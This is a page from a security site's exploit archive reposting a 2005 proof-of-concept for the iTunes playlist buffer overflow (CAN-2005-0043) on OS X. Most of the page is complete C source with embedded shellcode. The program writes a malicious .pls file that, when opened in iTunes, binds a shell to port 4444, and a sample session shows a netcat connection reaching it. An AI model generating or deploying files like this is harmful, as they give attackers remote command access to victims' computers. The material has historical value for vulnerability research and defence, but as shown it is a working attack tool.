首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple iTunes Playlist Buffer Overflow Proof of Concept Exploit
来源:www.felinemenace.org 作者:nemo 发布时间:2005-01-18  

Apple iTunes Playlist Buffer Overflow Proof of Concept Exploit

CAN-2005-0043

/*
* PoC for iTunes on OS X 10.3.7
* -( nemo@felinemenace.org )-
*
* Generates a .pls file, when loaded in iTunes it
* binds a shell to port 4444.
* Shellcode contains no \x00 or \x0a's.
*
* sample output:
*
* -[nemo@gir:~]$ ./fm-eyetewnz foo.pls
* -( fm-eyetewnz )-
* -( nemo@felinemenace.org )-
* Creating file: foo.pls.
* Bindshell on port: 4444
* -[nemo@gir:~]$ open foo.pls
* -[nemo@gir:~]$ nc localhost 4444
* id
* uid=501(nemo) gid=501(nemo) groups=501(nemo)
*
* Thanks to andrewg, mercy and core.
* Greetings to pulltheplug and felinemenace.
*
* -( need a challenge? )-
* -( http://pulltheplug.org )-
*/

#include <stdio.h>
#include <strings.h>

#define BUFSIZE 1598 + 4

char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa"
"\x38\xa5\xf8\x4a\x3c\xc0\xee\x83\x60\xc6\xb7\xfb\x38\x85\x07\xee"
"\x7c\x89\x03\xa6\x80\x9f\xf8\x4a\x7c\x84\x32\x78\x90\x9f\xf8\x4a"
"\x7c\x05\xf8\xac\x7c\xff\x04\xac\x7c\x05\xff\xac\x3b\xc5\x07\xba"
"\x7f\xff\xf2\x15\x42\x20\xff\xe0\x4c\xff\x01\x2c\xd6\xe3\xb7\xf9"
"\xd6\x03\xb7\xfa\xd6\x23\xb7\xfd\xd6\x83\xb7\x9a\xaa\x83\xb7\xf9"
"\x92\x83\xb5\x83\x92\xfd\xac\x83\xa6\x83\xb7\xf6\xee\x81\xa6\xa7"
"\xee\x83\xb7\xfb\x92\x0b\xb5\x5d\xd6\x23\xb7\xeb\xd6\x83\xb7\x93"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x83\xb7\x91"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x40\x44\x83"
"\xd6\x83\xb7\xe5\xd6\x03\xb7\xeb\x7e\x02\x48\x13\xd6\x22\x48\x13"
"\xd6\x02\x48\x0b\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x92\xfd\xac\x83"
"\xd6\x23\xb7\xf9\xd6\x83\xb7\xa1\x91\x40\x44\x83\x92\x27\x9c\x83"
"\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x26\x48\x04\xc2\x86\x48\x04"
"\xae\x01\x48\x1e\xd6\x83\xb7\xb9\xaa\x83\xb7\xf9\x92\x83\xb5\x83"
"\x92\x26\x9d\x82\xae\x01\x48\x06\x92\xeb\xb5\x5d\xd6\xe0\xb7\xd3"
"\x7e\xe2\x48\x03\x7e\x22\x48\x07\xd6\x02\x48\x03\xd6\x83\xb7\xc0"
"\x92\x83\xb3\x57\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x63\xb7\xf3"
"\xc1\xe1\xde\x95\xc1\xe0\xc4\x93\xee\x83\xb7\xfb";

int main(int ac, char **av)
{
int n,*p;
unsigned char * q;
char buf[BUFSIZE];
FILE *pls;
int offset=0x3DA8;
char playlist[] = {
"[playlist]\n"
"NumberOfEntries=1\n"
"File1=http://"
};
printf("-( fm-eyetewnz )-\n");
printf("-( nemo@felinemenace.org )-\n");
memset(buf,'\x60',BUFSIZE);
bcopy(shellcode, buf + (BUFSIZE - 44 - sizeof(shellcode)),sizeof(shellcode) - 1); // avoid mangled stack.
q = buf + sizeof(buf) - 5;
p = (int *)q;
if(!(av[1])) {
printf("usage: %s <filename (.pls)> [offset]\n",*av);
exit(1);
}
if(av[2])
offset = atoi(av[2]);
*p = (0xc0000000 - offset);// 0xbfffc258;
if(!(pls = fopen(*(av+1),"w+"))) {
printf("error opening file: %s.\n", *(av +1));
exit(1);
}
printf("Creating file: %s.\n",*(av+1));
printf("Bindshell on port: 4444\n");
fwrite(playlist,sizeof(playlist) - 1,1,pls);
fwrite(buf,sizeof(buf) - 1,1,pls);
fclose(pls);
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ITA Forum <= 1.49 SQL Injec
·Apple iTunes Playlist Remote B
·mremap missing do_munmap retur
·Linux kernel i386 SMP race con
·Linux kernel i386 SMP race con
·NodeManager Professional 2.00
·Microsoft Internet Explorer .A
·Peer2Mail Encrypted Password D
·Veritas Backup Exec Name Servi
·EXIM dns_buld_reverse() PoC
·Microsoft WINS Remote Code Exe
·fkey v0.0.2 Local File Accessi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved